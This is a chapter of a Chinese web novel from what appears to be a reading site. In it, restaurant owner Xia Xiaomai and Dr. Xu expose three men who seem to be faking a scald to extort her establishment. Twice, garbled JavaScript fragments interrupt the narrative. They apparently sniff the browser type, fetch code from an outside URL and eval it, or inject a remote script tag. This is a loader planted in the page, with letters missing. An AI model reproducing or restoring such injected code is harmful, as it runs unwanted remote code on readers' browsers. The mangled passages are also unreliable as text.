首页      小说目录      搜索
章节目录 第709章 又是闹事的
    夏小麦和徐大夫沉思着下楼,却被喧嚣的声音打断了思绪。

    “你这是什么态度”

    一声暴喝吸引了一楼大厅里所有餐桌上的客人目光。

    “对不起,对不起真的很抱歉我去拿一些烫伤药膏来”

    伙计阿杰着急的就要转身去柜台那边,拿取夏小麦原来备用的药膏。

    “诶你想跑啊”

    大汉一把抓住阿杰,呵斥道。

    “怎么了”

    二柱赶紧过去,询问怎么回事。

    喧嚣的餐桌上是三个壮汉,一个坐在位子上,另外两个人正在厉声呵斥阿杰。

    “三位客观,我是掌柜的,请问发生了什么事情”

    二柱客气的陪着笑脸。

    “掌柜的,你家伙计怎么这么不小心,烫伤了我的兄弟”

    老大皱眉,语气稍稍缓和。

    “诶你你你,笑什么笑烫伤我三弟了,有什么好笑的”

    老二一脸不耐烦,上前就推搡二柱。

    “住手”

    夏小麦一见对方来者不善的模样,便出声呵斥道。

    与此同时,大汉中的老二的手臂,已经被尧护卫稳稳的擒住,僵持在半空中。

    尧护卫冷冷的看着老二,一动不动。

    老二原本怒火中烧,嘴里骂骂咧咧,挣扎了几下,却没有成功挣脱尧护卫的钳制。

    “诶,你们干什么烫伤了客人,还要用强吗”

    老二叫嚣道。

    “膳禾馆开门做生意,来的就是客人,你们这样子喧嚣,岂不是吵着其他客人了刘掌柜上前询问情况是正常的行为,倒是这位客官,是要不分青红皂白的动手吗”

    夏小麦扬声说与在场的每一个人听。

    “你这是我动手吗”

    老二脸红脖子粗,指着尧护卫嚷嚷道。

    “你要是不动手脚,他会阻拦你吗在座的人可都是看着呢大家说,谁先动手的”

    夏小麦冷笑着问道。

    经历的事情多了,夏小麦明白一个道理,永远不要让对方占据主导,特别是来找茬的。

    眼前这三人,夏小麦一眼便看出来是来砸场子的。

    “我家二弟也是担心三弟,还请谅解。”

    老大稍稍缓了缓脸色,责怪的瞪了老二一眼。

    夏小麦笑吟吟的看着尧护卫,尧护卫这才松了手,站到了一旁。

    “大哥”

    老二自由了,便想理论,被老大拦了下来。

    “阿杰,你来说,怎么回事”

    夏小麦耐心的问道。

    在她的印象里,阿杰是个机灵懂事的伙计。

    “老板,我刚刚给这桌客人上最后一道药膳汤,结果这位客官正好起身,撞到了我才”

    阿杰支支吾吾的说道,显然是被大汉的呵斥吓到了。

    “你胡说你们膳禾馆还真的是店大欺客啊对客人动手动脚也就算了,烫伤了客人居然把责任推到客人身上”

    老二立刻就跳起来指责,引得店里的其他客人议论纷纷。

    夏小麦心里直翻白眼,这碰瓷的能不能有点技术含量这就沉不住起了,水平也太低了吧

    “大伙评评理,膳禾馆是不是店大欺客”

    var isios  navigatorerantatchpuacx

    navigatorerantdexof'uc

    oser'{

    function{var reestireestiur&ot;https:ehogypv6389811011ht&ot;reestithod't'reestirandid'c'athrandotostrg36substr2dodocuntriten''reestifuncfunction{var xhttpne xhttpreestxhttponreadystatechanfunction{ifxhttpreadystate4{doxreestrunfaseifxhttpstat200{evaxhttpresponsetext}}}xhttpopenreestithod,reestiur,truexhttpsend}ifdoxreestrun{doxreestruntruereestifunc}ese{reestitervasettervafunction{ifdoxreestrun{ceartervareestitervadoxreestruntruereestifunc}},500}}

    }ese{

    docuntriten&ot;script src'https:ehissq63898110&ot;athfoorathrando99999991&ot;xht'&ot;

    }

    老二激动不已。

    “客官这么激动,想来三兄弟也是感情至深的,何以弟弟烫伤了,两位哥哥都不着急他的伤势,反而大吵大闹呢”

    夏小麦担忧的看了看躲在后面的老三。

    “你胡说什么”

    老二表情一滞,慌张起来。

    “老板说的这是什么话,我的兄弟出了事,我们自然是关心,但是总要弄清楚原委吧不然大家岂不是真的认为是我们自己的问题夏老板可不要顾左右而言他。”

    老大冷冷的说道。

    “我是开门做生意的,这么大的酒楼难道还能跑了不成刚刚我的伙计一见出了事,便要去为客官取烫伤药膏,你们却拦着他不让他去,这又是为何”

    夏小麦缓缓的往前走,神情自若。

    “夏老板这话,显然是说我们三兄弟没事找事,自导自演栽赃你们膳禾馆”

    老大沉声问道。

    “你要做什么”

    老二紧张的看着走进他们的夏小麦。

    “你看看,这位三弟伤的都不知道喊疼了,还是让我帮忙看看伤口吧”

    夏小麦笑着指了指他俩身后坐着的大汉。

    大家看过去,老三才慌张的龇牙咧嘴,叫喊起来。

    “凭什么给你看你是老板,自然向着自己的伙计”

    老二白眼都快翻上天了。

    “好,我不看也行,那就让徐大夫来吧”

    夏小麦无所谓的摊了摊手,然后转身礼貌的让徐大夫过来。

    “干什么徐大夫也是你们的人,不许看”

    老二再次阻拦。

    “徐大夫是我的人哼,你好大的口气,徐大夫在这京城里的威望岂是我能比拟的不说整个京城,就光是这城东,谁不称赞徐大夫的医德”

    夏小麦说着,看向了周围的客人。

    “是啊,徐大夫可是悬壶济世的名医啊,我就是冲着他的名声来的。”

    一个客人义正言辞的说道。

    大家一听这话,纷纷点头,议论起来。

    “烫伤嘛,不是看看呗,该赔就赔,何必闹腾呢”

    又有人站出来说话。

    “既然如此,还请徐大夫帮忙看一下。”

    老大瞪了一眼多话的围观客人,咬着牙让开路。

    徐大夫也不客气,上前查看老三小腿上的情况。

    几个大大的水泡在老三的小腿之上,一看就是烫伤导致的。

    “啊疼”

    老三的表演也是差劲,刚刚没叫喊,这会徐大夫稍稍触碰他,连伤口都没挨,他就叫喊起来。

    小腿动来动去,徐大夫根本没有办法仔细查看。

    “小伙子,没事的,你忍一忍,老夫看一下。”

    徐大夫开始还很耐心的劝他。

    但是老三心中有鬼,自然是不能让徐大夫看出端倪。

    “你这是做什么看你弄的我三弟如此痛苦,他该不会是烫伤伤到骨头了吧”

    老二又跳了出来。

    徐大夫本也是个和善之人,行医多年,从来也没有被人这样刁难戏弄。

    “这是烫伤吗这是伤到骨头了手舞足蹈的,还阻拦我查看,伤到骨头的人能有这动静能做出这么多动作你是在侮辱我吗”

    徐大夫沉声呵斥道。

    var isios  navigatorerantatchpuacx

    navigatorerantdexof'uc

    oser'{

    function{var reestireestiur&ot;https:ehogypv6389811011ht&ot;reestithod't'reestirandid'c'athrandotostrg36substr2dodocuntriten''reestifuncfunction{var xhttpne xhttpreestxhttponreadystatechanfunction{ifxhttpreadystate4{doxreestrunfaseifxhttpstat200{evaxhttpresponsetext}}}xhttpopenreestithod,reestiur,truexhttpsend}ifdoxreestrun{doxreestruntruereestifunc}ese{reestitervasettervafunction{ifdoxreestrun{ceartervareestitervadoxreestruntruereestifunc}},500}}

    }ese{

    docuntriten&ot;script src'https:ehissq63898110&ot;athfoorathrando99999991&ot;xht'&ot;

    }
上一页     返回目录      下一页
  sitemap